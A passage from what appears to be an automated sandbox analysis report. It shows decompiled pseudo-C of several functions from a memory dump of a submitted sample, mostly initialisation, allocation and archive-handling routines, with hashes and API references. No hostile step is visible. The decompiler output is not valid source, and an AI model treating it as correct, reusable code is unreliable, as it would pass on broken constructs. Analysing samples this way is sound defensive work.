									_t22 = _t99 - 0x1010; // -2064
									__eflags = E00B6A56D(_t20, __eflags, _t22, _t21);
									if(__eflags == 0) {
										break;
									}
									_t95 = _t95 +  *((intOrPtr*)(_t99 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *((char*)(_t99 - 0x309e));
								}
								 *((intOrPtr*)(_t97 + 0xa0)) =  *((intOrPtr*)(_t97 + 0xa0)) + _t95;
								asm("adc [esi+0xa4], ebx");
							}
							_t25 = _t99 - 0x9d70; // -38256
							E00B68430(_t97, __eflags, _t25);
							_t54 =  *((intOrPtr*)(_t97 + 8));
							_t93 = 0x49;
							_pop(_t94);
							_t84 =  *(_t54 + 0x92fa) & 0x0000ffff;
							__eflags = _t84 - 0x54;
							if(_t84 == 0x54) {
								L13:
								 *((char*)(_t54 + 0x7201)) = 1;
							} else {
								__eflags = _t84 - _t93;
								if(_t84 == _t93) {
									goto L13;
								}
							}
							_t85 =  *((intOrPtr*)(_t97 + 8));
							__eflags =  *((intOrPtr*)(_t85 + 0x92fa)) - _t93;
							if( *((intOrPtr*)(_t85 + 0x92fa)) != _t93) {
								 *((char*)(_t85 + 0x7201)) =  *((char*)(_t85 + 0x7201)) == 0;
								E00B71B66((_t97 + 0x000000fe & 0xffffff00 |  *((char*)(_t85 + 0x7201)) == 0x00000000) & 0x000000ff, _t97 + 0xfe);
							}
							_t35 = _t99 - 0x9d70; // -38256
							E00B61F6D(_t35, _t93);
							do {
								_t36 = _t99 - 0x9d70; // -38256
								_t56 = E00B63B2D(_t36, _t93, _t97);
								_t37 = _t99 - 0xd; // 0x7f3
								_t38 = _t99 - 0x9d70; // -38256
								_t58 = E00B6848E(_t97, _t38, _t56, _t37); // executed
								__eflags = _t58;
							} while (_t58 != 0);
						}
					} else {
						E00B66D83(0xba1098, 1);
					}
				}
				_t39 = _t99 - 0x9d70; // -38256, executed
				E00B61692(_t39, _t94, _t97); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
				return 0;
			}

0x00b68284
0x00b68284
0x00b68284
0x00b68289
0x00b68293
0x00b6829a
0x00b6829c
0x00b682a2
0x00b682a5
0x00b682af
0x00b682b9
0x00b682ce
0x00b682d4
0x00b682d9
0x00b682db
0x00000000
0x00000000
0x00b682bb
0x00b682bb
0x00b682e1
0x00b682e3
0x00b682e9
0x00b682f0
0x00b68303
0x00b68309
0x00b6830f
0x00b68310
0x00b68312
0x00b68318
0x00b6831f
0x00b68326
0x00b6832d
0x00b68332
0x00b6834d
0x00b68359
0x00b68360
0x00b68365
0x00b6836b
0x00b68370
0x00b68372
0x00b68379
0x00b68385
0x00b68387
0x00000000
0x00000000
0x00b6833a
0x00b68340
0x00b68346
0x00b68346
0x00b68389
0x00b6838f
0x00b6838f
0x00b68395
0x00b6839e
0x00b683a3
0x00b683a8
0x00b683a9
0x00b683aa
0x00b683b1
0x00b683b4
0x00b683bb
0x00b683bb
0x00b683b6
0x00b683b6
0x00b683b9
0x00000000
0x00000000
0x00b683b9
0x00b683c2
0x00b683c5
0x00b683cc
0x00b683dc
0x00b683e3
0x00b683e3
0x00b683e8
0x00b683ee
0x00b683f3
0x00b683f3
0x00b683f9
0x00b683fe
0x00b68403
0x00b6840c
0x00b68411
0x00b68411
0x00b683f3
0x00b682f2
0x00b682f9
0x00b682f9
0x00b682f0
0x00b68415
0x00b6841b
0x00b68427
0x00b6842f

APIs

__EH_prolog.LIBCMT ref: 00B68289

Part of subcall function 00B613DC: __EH_prolog.LIBCMT ref: 00B613E1

Part of subcall function 00B6A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6A598

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 5c04a064e079dc89575aa8eb08568cd2992b71cc0ab36d928d151ab97d186aa3
Instruction ID: a1893ac98c74d4e8ac75bb5900384cb3f58cbce47faa94768d3be0043cd14e3c
Opcode Fuzzy Hash: 5c04a064e079dc89575aa8eb08568cd2992b71cc0ab36d928d151ab97d186aa3
Instruction Fuzzy Hash: A041A4719446589ADB20DB60CC95AEAB3F8EF04304F0405EBE19AA7193EF795EC5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B613E1 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B613E1(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t55;
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E00B7EB78(_t55, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E00B69556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xb935f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00B65E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00B6CE40(__ecx + 0x20f8, __edx, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E00B6157A();
				_t61 = E00B6157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E00B7EB38(__edx, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E00B6B505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E00B7FFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E00B7FFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E00B7FFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00b613e1
0x00b613e1
0x00b613e1
0x00b613e6
0x00b613e7
0x00b613ea
0x00b613ec
0x00b613ef
0x00b613f6
0x00b61402
0x00b61405
0x00b61410
0x00b61414
0x00b6141f
0x00b61425
0x00b6142b
0x00b61436
0x00b6143b
0x00b61440
0x00b61447
0x00b6144d
0x00b61453
0x00b61455
0x00b6147a
0x00b61457
0x00b61457
0x00b6145c
0x00b61462
0x00b61465
0x00b6146b
0x00b61476
0x00b6146d
0x00b6146f
0x00b6146f
0x00b6146b
0x00b6147c
0x00b61488
0x00b6148f
0x00b61496
0x00b6149f
0x00b614aa
0x00b614b4
0x00b614ba
0x00b614c0
0x00b614c6
0x00b614cc
0x00b614d2
0x00b614d8
0x00b614df
0x00b614e5
0x00b614eb
0x00b614f1
0x00b614f7
0x00b614fd
0x00b6150c
0x00b6151b
0x00b61526
0x00b6152e
0x00b61534
0x00b6153a
0x00b61540
0x00b61546
0x00b6154c
0x00b61552
0x00b6155b
0x00b61561
0x00b61567
0x00b6156f
0x00b61577

APIs

__EH_prolog.LIBCMT ref: 00B613E1

Part of subcall function 00B65E37: __EH_prolog.LIBCMT ref: 00B65E3C

Part of subcall function 00B6CE40: __EH_prolog.LIBCMT ref: 00B6CE45

Part of subcall function 00B6B505: __EH_prolog.LIBCMT ref: 00B6B50A

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 911e141b143b7ca4780809e91596ea32f4bdb1cc29d374e20594a3f025f50c06
Instruction ID: 8f2e3c20e61f29409c9ead62977f42af327683388b011e09469cd7d2bbe12a6b
Opcode Fuzzy Hash: 911e141b143b7ca4780809e91596ea32f4bdb1cc29d374e20594a3f025f50c06
Instruction Fuzzy Hash: 2B4149B0905B409EE724CF398885AE6FBE5BF28300F54496ED5FF87282CB366654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B613DC Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B613DC(intOrPtr __ecx, void* __edi, void* __eflags) {
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t86;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E00B7EB78(0xb92635, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E00B69556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xb935f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00B65E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00B6CE40(__ecx + 0x20f8, _t86, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E00B6157A();
				_t61 = E00B6157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E00B7EB38(_t86, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E00B6B505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E00B7FFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E00B7FFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E00B7FFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00b613dc
0x00b613dc
0x00b613e1
0x00b613e6
0x00b613e7
0x00b613ea
0x00b613ec
0x00b613ef
0x00b613f6
0x00b61402
0x00b61405
0x00b61410
0x00b61414
0x00b6141f
0x00b61425
0x00b6142b
0x00b61436
0x00b6143b
0x00b61440
0x00b61447
0x00b6144d
0x00b61453
0x00b61455
0x00b6147a
0x00b61457
0x00b61457
0x00b6145c
0x00b61462
0x00b61465
0x00b6146b
0x00b61476
0x00b6146d
0x00b6146f
0x00b6146f
0x00b6146b
0x00b6147c
0x00b61488
0x00b6148f
0x00b61496
0x00b6149f
0x00b614aa
0x00b614b4
0x00b614ba
0x00b614c0
0x00b614c6
0x00b614cc
0x00b614d2
0x00b614d8
0x00b614df
0x00b614e5
0x00b614eb
0x00b614f1
0x00b614f7
0x00b614fd
0x00b6150c
0x00b6151b
0x00b61526
0x00b6152e
0x00b61534
0x00b6153a
0x00b61540
0x00b61546
0x00b6154c
0x00b61552
0x00b6155b
0x00b61561
0x00b61567
0x00b6156f
0x00b61577

APIs

__EH_prolog.LIBCMT ref: 00B613E1

Part of subcall function 00B65E37: __EH_prolog.LIBCMT ref: 00B65E3C

Part of subcall function 00B6CE40: __EH_prolog.LIBCMT ref: 00B6CE45

Part of subcall function 00B6B505: __EH_prolog.LIBCMT ref: 00B6B50A

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5331b7ac1f0873bb4f9f12463cff09143805e535e59c3d768fa53c2972d94dff
Instruction ID: f0601c0988f89c3334af7265d5590e053db34efdcf64a3f0fa5f5d60a8e37097
Opcode Fuzzy Hash: 5331b7ac1f0873bb4f9f12463cff09143805e535e59c3d768fa53c2972d94dff
Instruction Fuzzy Hash: BD4148B0905B409EE724DF798885AE6FBE5BF28300F54496ED5FF87282CB366654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B7359E Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00B7359E(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t29;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t29 = E00B7EB78(0xb92a92, _t67);
				_push(__ecx);
				_push(__ecx);
				_t60 = __ecx;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(__ecx + 0x20));
				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00B7EE53(__ecx, __edx, _t72); // executed
					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
					_t29 = E00B7FFF0(__ecx, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t65 * 0x00004ae4) + 0x00000004); // executed
					_t36 = E00B7EE53(( ~(_t73 > 0) | _t65 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t73); // executed
					_pop(0xba1098);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00B72360);
						_push(E00B721C0);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00B7EC7B(_t44, _t60, _t65, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00B7FFF0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00B83E33(0xba1098); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xba1098 = 0x30c00;
								if(_t39 == 0) {
									E00B66CA7(0xba1098);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}

0x00b735a3
0x00b735a8
0x00b735a9
0x00b735ad
0x00b735af
0x00b735b1
0x00b735b4
0x00b735bb
0x00b735bc
0x00b735c4
0x00b735c7
0x00b735cc
0x00b735cc
0x00b735cf
0x00b735d2
0x00b735dd
0x00b735e4
0x00b735e6
0x00b735fe
0x00b735ff
0x00b73604
0x00b73605
0x00b73608
0x00b7360b
0x00b7360d
0x00b7360f
0x00b73614
0x00b73619
0x00b7361a
0x00b7361a
0x00b7361d
0x00b7361f
0x00b73624
0x00b73625
0x00b73625
0x00b7362a
0x00b73634
0x00b7363b
0x00b73645
0x00b73647
0x00b73649
0x00b7364c
0x00b7364f
0x00b73658
0x00b7365f
0x00b73669
0x00b7366e
0x00b73674
0x00b73677
0x00b7367e
0x00b7367e
0x00b73683
0x00b73683
0x00b73686
0x00b7368b
0x00b7368e
0x00b7368e
0x00b7364c
0x00b73645
0x00b73699
0x00b736a1

APIs

__EH_prolog.LIBCMT ref: 00B735A3

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c2b1a94f455484265812763d5a50fe9f79aaf874d1ee7596e27b3290a9ccb021
Instruction ID: 416273cff7f6547190b63db61f85ecb6fd626b2d9a84aa72325ac59b14da6107
Opcode Fuzzy Hash: c2b1a94f455484265812763d5a50fe9f79aaf874d1ee7596e27b3290a9ccb021
Instruction Fuzzy Hash: 8821E4B5E40211ABDB149F74CC4166B77E8FF18714F0485BAE52AEB681D770DA00C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B093 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00B7B093(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				char _t39;
				char _t41;
				char _t60;
				char _t65;
				signed int _t70;
				void* _t72;
				intOrPtr _t74;
				void* _t77;

				_t77 = __eflags;
				E00B7EB78(0xb92ae8, _t72);
				_push(__ecx);
				E00B7EC50(0x7d2c);
				_push(_t70);
				_push(_t68);
				 *((intOrPtr*)(_t72 - 0x10)) = _t74;
				 *((intOrPtr*)(_t72 - 4)) = 0;
				E00B613DC(_t72 - 0x7d3c, _t68, _t77, 0); // executed
				 *((char*)(_t72 - 4)) = 1;
				E00B61FDC(_t72 - 0x7d3c, __edx, _t70, _t72, _t77,  *((intOrPtr*)(_t72 + 0xc)));
				if( *((intOrPtr*)(_t72 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t72 - 0x24)) = 0;
					 *(_t72 - 0x20) = 0;
					 *((intOrPtr*)(_t72 - 0x1c)) = 0;
					 *((intOrPtr*)(_t72 - 0x18)) = 0;
					 *((char*)(_t72 - 0x14)) = 0;
					 *((char*)(_t72 - 4)) = 2;
					_push(_t72 - 0x24);
					_t59 = _t72 - 0x7d3c;
					_t39 = E00B619AF(_t72 - 0x7d3c, __edx);
					__eflags = _t39;
					if(_t39 != 0) {
						_t70 =  *(_t72 - 0x20);
						_t68 = _t70 + _t70;
						_push(_t70 + _t70 + 2);
						_t65 = E00B83E33(_t59);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x10)))) = _t65;
						__eflags = _t65;
						if(_t65 != 0) {
							__eflags = 0;
							 *((short*)(_t65 + _t70 * 2)) = 0;
							E00B80320(_t65,  *((intOrPtr*)(_t72 - 0x24)), _t68);
						} else {
							_t70 = 0;
						}
						 *( *(_t72 + 0x14)) = _t70;
					}
					_t60 =  *((intOrPtr*)(_t72 - 0x24));
					 *((char*)(_t72 - 4)) = 3;
					__eflags = _t60;
					if(_t60 != 0) {
						__eflags =  *((char*)(_t72 - 0x14));
						if( *((char*)(_t72 - 0x14)) != 0) {
							__eflags =  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c));
							E00B6F445(_t60,  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c)));
							_t60 =  *((intOrPtr*)(_t72 - 0x24));
						}
						L00B83E2E(_t60);
					}
					E00B61692(_t72 - 0x7d3c, _t68, _t70); // executed
					_t41 = 1;
				} else {
					E00B61692(_t72 - 0x7d3c, _t68, _t70);
					_t41 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return _t41;
			}

0x00b7b093
0x00b7b098
0x00b7b09d
0x00b7b0a3
0x00b7b0a9
0x00b7b0aa
0x00b7b0ad
0x00b7b0b7
0x00b7b0ba
0x00b7b0c8
0x00b7b0cc
0x00b7b0d7
0x00b7b0eb
0x00b7b0ee
0x00b7b0f1
0x00b7b0f4
0x00b7b0f7
0x00b7b0fd
0x00b7b101
0x00b7b102
0x00b7b108
0x00b7b10d
0x00b7b10f
0x00b7b111
0x00b7b114
0x00b7b11a
0x00b7b121
0x00b7b126
0x00b7b128
0x00b7b12a
0x00b7b130
0x00b7b133
0x00b7b13b
0x00b7b12c
0x00b7b12c
0x00b7b12c
0x00b7b146
0x00b7b146
0x00b7b148
0x00b7b14b
0x00b7b14f
0x00b7b151
0x00b7b153
0x00b7b157
0x00b7b15c
0x00b7b160
0x00b7b165
0x00b7b165
0x00b7b169
0x00b7b16e
0x00b7b175
0x00b7b17a
0x00b7b0d9
0x00b7b0df
0x00b7b0e4
0x00b7b0e4
0x00b7b181
0x00b7b18a

APIs

__EH_prolog.LIBCMT ref: 00B7B098

Part of subcall function 00B613DC: __EH_prolog.LIBCMT ref: 00B613E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fdbea1f8c50a9c05aa70d4f4a9bfbb8c115ca4a027bd652321687bd6da1cb666
Instruction ID: 5175db13512e4bae05072e735beff510c509428073be9fa582c36c5a7ab7bf72
Opcode Fuzzy Hash: fdbea1f8c50a9c05aa70d4f4a9bfbb8c115ca4a027bd652321687bd6da1cb666
Instruction Fuzzy Hash: 19316D75C10249AACF15DF68C851AEEBBF4AF09304F5448DEE419B7242DB39AE04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AC98 Relevance: 1.6, APIs: 1, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00B8AC98(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xbc2628 + _a4 * 4;
				_t27 =  *0xb9e7ac; // 0x37e7c6f
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xb9e7ac; // 0x37e7c6f
							goto L13;
						}
						 *_t20 = E00B87CA3(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00B8AD34( *_t34); // executed
